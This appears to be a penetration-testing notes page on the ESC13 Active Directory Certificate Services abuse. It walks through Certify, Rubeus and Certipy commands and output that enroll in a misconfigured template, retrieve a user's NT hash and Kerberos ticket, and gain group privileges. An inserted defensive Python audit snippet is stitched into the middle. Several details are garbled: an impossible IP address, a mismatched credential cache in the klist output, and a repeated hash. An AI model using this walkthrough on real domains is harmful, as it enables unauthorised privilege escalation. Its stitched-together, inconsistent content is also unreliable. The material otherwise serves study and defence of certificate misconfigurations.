
ESC13

If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.

Windows

Request a certificate from the certificate template <template_name>

.\Certify.exe request /ca:<ca> /template:<template_name>

Save and convert the certificate

certutil -MergePFX .\esc13.pem .\esc13.pfx

Confirm the Client Authentication EKU and the ESC13OID issuance policy

certutil -Dump -v .\esc13.pfx

Authenticate (using the certificate)

.\Rubeus.exe asktgt /user:<user> /certificate:C:\esc13.pfx /nowrap

Linux

At the time of writing (04/03/2024), Certipy does not support ESC13, so we need to use a specific pull request to find the vulnerable template.

The scenario

We have valid domain credentials for the user otter and can use certipy to look for misconfigured certificate templates. Doing so, we find a template like the following, which allows members of the SomeGroup group to enroll in a high-privilege certificate:

  ...

  33
    Template Name                       : AnotherCoolTemplate
    Display Name                        : AnotherCoolTemplate

    ...

    Extended Key Usage                  : Server Authentication
                                          Encrypting File System
                                          Secure Email
                                          Client Authentication

    ...
    Permissions
      Enrollment Permissions
        Enrollment Rights               : MINIONS.COM\SomeGroup
                                          MINIONS.COM\Domain Admins
                                          MINIONS.COM\Enterprise Admins
      Object Control Permissions
        Owner                           : MINIONS.COM\Administrator
        Write Owner Principals          : MINIONS.COM\Domain Admins
                                          MINIONS.COM\Enterprise Admins
                                          MINIONS.COM\Administrator
        Write Dacl Principals           : MINIONS.COM\Domain Admins
                                          MINIONS.COM\Enterprise Admins
                                          MINIONS.COM\Administrator
        Write Property Principals       : MINIONS.COM\Domain Admins
                                          MINIONS.COM\Enterprise Admins
                                          MINIONS.COM\Administrator

  ...

The SomeGroup group contains the users from the Certificate Services group. Our goal is therefore to find a misconfigured template that allows members of Certificate Services to enroll, which by proxy lets us enroll in the high-privilege template that requires SomeGroup membership. Certipy usually does a good job of pointing these out, but it is worth checking the enrollment permissions of the templates it finds by hand.

You can read more about how this works in the SpecterOps post listed under References.

Setting up Certipy

These are the commands to (safely) set up the certipy PR with ESC13 support:

~ ∮ git clone https://github.com/ly4k/Certipy.git
~ ∮ cd Certipy
Certipy ∮ gh pr checkout 196
Certipy ∮ virtualenv venv
Certipy ∮ source ./venv/bin/activate
(venv) Certipy ∮ python3 setup.py install

Finding the vulnerable certificate

(venv) Certipy ∮ ./venv/bin/certipy find -u 'otter@minions.com' -p 'SomethingSecure123!' -stdout -dc-ip 192.168.100.1001.8 -debug -vulnerable
Certificate Templates
  0
    Template Name                       : SomeSecureTemplate 
    Display Name                        : SomeSecureTemplate
    Certificate Authorities             : minions-DC01-CA

    ...

    [!] Vulnerabilities
      ESC13                             : 'MINIONS.COM\\Certificate Services' can enroll, template allows client authentication and issuance policy is linked to group ['CN=Certificate Managers,CN=Users,DC=minions,DC=com']
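The certipy finding above is the ESC13 condition from the introduction: a low-privileged principal can enroll, the template carries the Client Authentication EKU, and one of its issuance policies has an OID group link. The following is an added audit example (not part of the page and not Certipy's code) that evaluates that condition offline over template and issuance-policy records; the attribute names come from AD CS, while the record layout, the OID values and the sample data are constructed to mirror the page's scenario.

```python
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional

CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"
# Principals whose enrollment rights are expected on a template and are not findings.
ADMIN_PRINCIPALS = {"Domain Admins", "Enterprise Admins", "Administrator"}

@dataclass
class Template:
    name: str
    ekus: set                      # pKIExtendedKeyUsage OIDs
    issuance_policies: list        # msPKI-Certificate-Policy OIDs
    enrollment_rights: set         # principals holding Certificate-Enrollment
    manager_approval: bool = False # CA certificate manager approval required

@dataclass
class IssuancePolicy:
    oid: str                       # msPKI-Cert-Template-OID of the OID object
    group_link: Optional[str] = None  # msDS-OIDToGroupLink (group DN), if any

def find_esc13(templates, policies, privileged=ADMIN_PRINCIPALS):
    """Return (template, enrolling principal, linked group DN) triples."""
    links = {p.oid: p.group_link for p in policies if p.group_link}
    findings = []
    for t in templates:
        # Client authentication must be possible and issuance must be automatic.
        if CLIENT_AUTH_EKU not in t.ekus or t.manager_approval:
            continue
        linked = [links[o] for o in t.issuance_policies if o in links]
        if not linked:
            continue
        for principal in sorted(t.enrollment_rights):
            if principal.split("\\")[-1] in privileged:
                continue
            findings.extend((t.name, principal, g) for g in linked)
    return findings

# Constructed sample data (not real directory contents).
SAMPLE_POLICIES = [
    IssuancePolicy("1.3.6.1.4.1.311.21.8.1.1",
                   "CN=Certificate Managers,CN=Users,DC=minions,DC=com"),
    IssuancePolicy("1.3.6.1.4.1.311.21.8.1.2"),  # no group link: harmless
]
SAMPLE_TEMPLATES = [
    Template("SomeSecureTemplate", {CLIENT_AUTH_EKU}, ["1.3.6.1.4.1.311.21.8.1.1"],
             {"MINIONS.COM\\Certificate Services", "MINIONS.COM\\Domain Admins"}),
    Template("WebServer", {"1.3.6.1.5.5.7.3.1"}, ["1.3.6.1.4.1.311.21.8.1.1"],
             {"MINIONS.COM\\Domain Computers"}),  # no client auth EKU
    Template("Approved", {CLIENT_AUTH_EKU}, ["1.3.6.1.4.1.311.21.8.1.1"],
             {"MINIONS.COM\\Domain Users"}, manager_approval=True),
]
```

The remediation the finding implies is to remove the group link from the issuance policy or restrict enrollment rights on the template; re-running the check after either change yields an empty result.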

Enrolling in the vulnerable certificate

Once we have found a vulnerable and suitable certificate template, we enroll in it and authenticate with the newly granted certificate to get a ticket, which we then use to request a new certificate as a member of the SomeGroup group.

(venv) Certipy ∮ ./venv/bin/certipy req -u 'otter@minions.com' -p 'SomethingSecure123!' -dc-ip 192.168.100.1001.8 -template 'SomeSecureTemplate' -ca 'minions-DC01-CA' -key-size 4096

...

[*] Saved certificate and private key to 'otter.pfx'
(venv) Certipy ∮ ./venv/bin/certipy auth -pfx otter.pfx -domain minions.com -dc-ip 192.168.100.1001.8

...

[*] Saved credential cache to 'otter.ccache'
[*] Trying to retrieve NT hash for 'otter'
[*] Got hash for 'otter@minions.com': aad3b435b51404eeaad3b435b51404ee:fcd6f8047a642d8d0c9d0e117634e889

Enrolling in the second certificate

(venv) Certipy ∮ export KRB5CCNAME=$PWD/otter.ccache
(venv) Certipy ∮ klist
Ticket cache: FILE: ... /Certipy/svc_cabackup.ccache
Default principal: otter@MINIONS.COM

Valid starting       Expires              Service principal
03/04/2024 09:35:20  03/04/2024 19:35:20  krbtgt/MINIONS.COM@MINIONS.COM
        renew until 04/04/2024 09:34:20

(venv) Certipy ∮ ./venv/bin/certipy req -u 'otter@minions.com' -k -no-pass -dc-ip 192.168.100.1001.8 -template 'AnotherCoolTemplate' -ca 'minions-DC01-CA' -key-size 4096 -target 'dc01.minions.com'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

...

[*] Saved certificate and private key to 'otter.pfx'

(venv) Certipy ∮ ./venv/bin/certipy auth -pfx otter.pfx -domain minions.com -dc-ip 192.168.100.1001.8
Certipy v4.8.2 - by Oliver Lyak (ly4k)

...

[*] Saved credential cache to 'otter.ccache'
[*] Trying to retrieve NT hash for 'otter'
[*] Got hash for 'otter@minions.com': aad3b435b51404eeaad3b435b51404ee:fcd6f8047a642d8d0c9d0e117634e889

(venv) Certipy ∮ export KRB5CCNAME=$PWD/svc_cabackup.ccache

We now have a high-privilege certificate / ticket we can authenticate with.

References

https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53